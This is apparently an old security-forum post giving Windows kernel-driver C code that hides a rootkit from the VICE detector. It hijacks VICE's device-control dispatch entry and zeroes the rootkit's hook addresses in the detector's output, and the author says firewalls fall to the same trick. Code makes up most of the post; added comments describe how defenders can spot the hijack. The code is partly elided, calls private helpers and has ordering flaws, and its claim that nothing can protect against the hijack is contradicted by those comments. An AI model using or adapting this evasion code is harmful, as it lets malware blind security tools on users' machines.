Featured Article: Nostalgia: n00bk1t, an advanced ring3 rootkit in C by jeffosz

Bypassing VICE 2 (reprise) By: valerino

Hi dudes. I've just stumbled upon the new VICE and read the article by OpCode. Well, nice trick, but really I don't see the point..... VICE, like all drivers (some firewalls included — play a bit and you'll find which), can be quickly bypassed with a simpler method: hijacking its dispatch table and masking the buffer it sends back to its user-mode client. A quick trip through DevFilter or OSR's IrpTracker reveals the IOCTL which sends back the buffer filled with "hooker" addresses. Knowing this, it's trivial.... Here are some snippets (some of the functions used are from my private library that I can't release, but their implementation is trivial and can be easily deduced from the names):
///////////////////////////////////////////////////////////////////////////
A) We need a NotifyLoadModule routine which does this:
/*
 * Image-load notify callback (the signature matches a PLOAD_IMAGE_NOTIFY_ROUTINE).
 * Compares the name of the image being loaded against VICE_DRIVER_NAME using the
 * author's private Utilwcsstrsize (judging by its arguments, a length-bounded
 * wide-string search).  On a match it arms a 100 ms timer whose DPC,
 * ModVicePatch, goes on to patch the VICE dispatch table.
 * ProcessId and ImageInfo are unused in the portion shown; the author elided
 * the rest of the body with dotted lines.
 *
 * Defender note: registered load-image callbacks are enumerable from kernel
 * memory and are a standard memory-forensics artefact.
 */
VOID ModuleLoadNotify(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo)
{
    /* author's elision: earlier part of the body not shown on the page */
    ....................................................
    if (Utilwcsstrsize(FullImageName->Buffer, VICE_DRIVER_NAME, FullImageName->Length, wcslen(VICE_DRIVER_NAME) * sizeof(WCHAR))) {
        // vice is being loaded, initialize a DPC to patch it immediately
        // after this function return
        // one-shot timer: RELATIVE(MILLISECONDS(100)) is a relative due time
        KeInitializeTimerEx(&TimerVicePatch, SynchronizationTimer);
        ViceFireDpcDelay.QuadPart = RELATIVE(MILLISECONDS(100));
        KeSetTimer(&TimerVicePatch,ViceFireDpcDelay,&VicePatchDpc);
        KeInitializeDpc(&VicePatchDpc,(PKDEFERRED_ROUTINE)ModVicePatch,NULL);
        KDebugPrint (1,("%s Found VICE.\n",MODULE));
    /* author's elision: remainder not shown; the page's copy has one closing brace fewer than it opens */
    ....................................................
}
B) Having set up the DPC, here are the related routines:
//************************************************************************
// NTSTATUS ModViceComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
//
// Completion routine that ModViceBypassDeviceControl installs on VICE's
// device-control IRP.  Runs after the real VICE dispatch has filled
// Irp->AssociatedIrp.SystemBuffer; scans that buffer for the 4-byte values of
// four of this driver's own hook addresses, zeroes the first match of each,
// then signals pCtx->Event so the waiting dispatch can return.
//
// Context: the PNONPAGED_COMPLETION_CTX whose Event the caller initialised.
// Returns STATUS_SUCCESS unconditionally.
//
// Defender note: the user-mode client never observes the interposition; the
// only thing modified is the detector's own result buffer, so a zeroed
// address slot in that output is the artefact worth flagging.
//************************************************************************/
NTSTATUS ModViceComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
    char* pBuffer = NULL;
    BOOLEAN found = TRUE;            /* assigned, never read */
    BYTE* pTarget = NULL;
    ULONG Length;
    PIO_STACK_LOCATION IrpSp;        /* assigned below, never read */
    PNONPAGED_COMPLETION_CTX pCtx;
    ULONG Address;
    IrpSp = IoGetCurrentIrpStackLocation(Irp);
    pCtx = (PNONPAGED_COMPLETION_CTX)Context;
    // get size and buffer
    // Length is the byte count the real dispatch reported in IoStatus.Information
    // (narrowed into a ULONG); the data is read from the IRP's system buffer, so
    // the IOCTL is presumably METHOD_BUFFERED — not verified here.
    Length = Irp->IoStatus.Information;
    pBuffer = Irp->AssociatedIrp.SystemBuffer;
    // check addresses of our hooks and mask'em if found
    // UtilFindBufInBuf is the author's private helper; from its use here it
    // returns a pointer to the first occurrence of the 4-byte pattern at
    // (BYTE*)&Address within pBuffer[0..Length), or NULL.  Casting a function
    // pointer to ULONG assumes a 32-bit build.
    Address = (ULONG)FWallMyZwWriteFile;
    pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
    if (pTarget) { memset (pTarget,0,sizeof (ULONG)); }
    Address = (ULONG)RegistryMyZwEnumerateKey;
    pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
    if (pTarget) { memset (pTarget,0,sizeof (ULONG)); }
    Address = (ULONG)RegistryMyZwQueryKey;
    pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
    if (pTarget) { memset (pTarget,0,sizeof (ULONG)); }
    Address = (ULONG)RegistryMyZwOpenKey;
    pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
    if (pTarget) { memset (pTarget,0,sizeof (ULONG)); }
    // signal event and exit
    // wakes the KeWaitForSingleObject in ModViceBypassDeviceControl
    KeSetEvent(&pCtx->Event,IO_NO_INCREMENT,FALSE);
    return STATUS_SUCCESS;
}
/***********************************************************************
 * NTSTATUS ModViceBypassDeviceControl(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
 *
 * Replacement IRP_MJ_DEVICE_CONTROL dispatch written into the VICE driver
 * object by ModVicePatchWorkRoutine.  Every control code except 0x55108004
 * (the one the author identified as returning the detector's address list)
 * is forwarded untouched to ModViceRealDeviceControl, the saved original
 * dispatch.  For 0x55108004 the routine installs ModViceComplete as the
 * IRP's completion routine, forwards the IRP, and blocks until the
 * completion routine signals the event.
 *
 * Returns whatever ModViceRealDeviceControl returned.
 *
 * Defender note: nothing visible to the user-mode client changes, so a
 * detector can only notice this from inside the kernel, e.g. by checking
 * that its own MajorFunction[IRP_MJ_DEVICE_CONTROL] still points at its
 * own dispatch routine.
 ***********************************************************************/
NTSTATUS ModViceBypassDeviceControl(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
    PIO_STACK_LOCATION IrpSp;
    PNONPAGED_COMPLETION_CTX pCtx = NULL;
    NTSTATUS Status;

    IrpSp = IoGetCurrentIrpStackLocation(Irp);
    // check controlcode
    // any other IOCTL is passed straight through to the original dispatch
    if (IrpSp->Parameters.DeviceIoControl.IoControlCode != 0x55108004) {
        return ModViceRealDeviceControl(pDeviceObject,Irp);
    }
    // context comes from a non-paged lookaside list, presumably because the
    // completion routine can run at DISPATCH_LEVEL; if allocation fails the
    // IRP is forwarded unmasked
    pCtx = ExAllocateFromNPagedLookasideList(&NonPagedHooksCtxLookaside);
    if (!pCtx) {
        return ModViceRealDeviceControl(pDeviceObject,Irp);
    }
    // install completion routine in *this* stack location (dirty hack :))
    // we install a completion routine since we need to peek in the irp buffer
    // *after* the real dispatch has been done.
    // NOTE(review): the three stores below replace whatever CompletionRoutine,
    // Context and Control the I/O manager or an upper driver already placed in
    // this stack location; nothing saves or chains the previous values.
    KeInitializeEvent(&pCtx->Event,NotificationEvent,FALSE);
    IrpSp->CompletionRoutine = ModViceComplete;
    IrpSp->Context = pCtx;
    IrpSp->Control = 0;              /* dead store: overwritten on the next line */
    IrpSp->Control = SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_CANCEL | SL_INVOKE_ON_ERROR;
    // call real handler
    Status = ModViceRealDeviceControl(pDeviceObject, Irp);
    // and wait for completion
    // blocks this thread until ModViceComplete has run and set the event
    KeWaitForSingleObject(&pCtx->Event,Executive,KernelMode,FALSE,NULL);
    ExFreeToNPagedLookasideList(&NonPagedHooksCtxLookaside,pCtx);

    return Status;
}
//************************************************************************
// VOID ModVicePatchWorkRoutine (PDEVICE_OBJECT DeviceObject, PVOID Context)
//
// Work item queued by ModVicePatch so that the patch runs at PASSIVE_LEVEL.
// Looks up the VICE driver object by name, saves its
// MajorFunction[IRP_MJ_DEVICE_CONTROL] entry in ModViceRealDeviceControl and
// replaces it with ModViceBypassDeviceControl.
//
// Context: the PIO_WORKITEM allocated in ModVicePatch; freed here on every path.
//
// Defender note: after this runs, the VICE driver object's IRP_MJ_DEVICE_CONTROL
// entry points outside the VICE image.  Comparing each MajorFunction[] entry
// against the owning driver's DriverStart/DriverSize range is the standard
// check that detects this kind of dispatch-table hijack.
//************************************************************************/
VOID ModVicePatchWorkRoutine (PDEVICE_OBJECT DeviceObject, PVOID Context)
{
    PDRIVER_OBJECT pDriverObject;
    UNICODE_STRING ucName;
    KIRQL OldIrql;

    RtlInitUnicodeString(&ucName,L"\\Driver\\VICESYS");
    // this must be called at PASSIVE_LEVEL (ObOpenObjectByName,etc...)
    // UtilGetObjectByName is the author's private helper; the ObDereferenceObject
    // below implies it returns a referenced driver object, or NULL on failure.
    pDriverObject = UtilGetObjectByName(&ucName);
    if (!pDriverObject) {
        KDebugPrint(1, ("%s Can't find VICE driver.\n", MODULE));
        goto __exit;
    }

    // patch the dispatch table
    // single pointer swap under raised IRQL; the original entry is kept so
    // ModViceBypassDeviceControl can forward to it
    KeRaiseIrql(DISPATCH_LEVEL,&OldIrql);
    ModViceRealDeviceControl = pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL];
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ModViceBypassDeviceControl;
    KeLowerIrql(OldIrql);

    KDebugPrint(1, ("%s Patched VICE trojan detector.\n", MODULE));
    ObDereferenceObject(pDriverObject);
__exit:                                  /* style: identifiers beginning with "__" are reserved */
    IoFreeWorkItem(Context);
}
//************************************************************************
// VOID ModVicePatch()
//
// DPC routine fired by the 100 ms timer that ModuleLoadNotify arms when it
// sees the VICE driver image loading.  DPCs run at DISPATCH_LEVEL, so the
// actual patch is handed off to ModVicePatchWorkRoutine on a work item.
// None of the four standard DPC parameters are used.
//************************************************************************/
VOID ModVicePatch(IN PKDPC Dpc, IN PVOID DeferredContext, IN PVOID SystemArgument1, IN PVOID SystemArgument2)
{
    PIO_WORKITEM pWrkItem;

    // we don't need the timer anymore
    KeCancelTimer(&TimerVicePatch);

    // use a workitem to do the stuff since we're at dispatch_level now
    // MyDrvObj is presumably this driver's own driver object.  The work item is
    // passed to the work routine as its Context and freed there; if allocation
    // fails the patch is silently skipped.
    pWrkItem = IoAllocateWorkItem(MyDrvObj->DeviceObject);
    if (pWrkItem) {
        IoQueueWorkItem(pWrkItem,ModVicePatchWorkRoutine,CriticalWorkQueue, pWrkItem);
    }
}
///////////////////////////////////////////////////////////////////////////
Here it is..... easy, no? There's no way to protect against this, unless a driver protects its dispatch table by modifying the PTEs. As I said, many firewalls can be bypassed with (more or less) the same method. Kudos to all the guys here, you're all really smart :) Regards, Valerino valerino@bonbon.net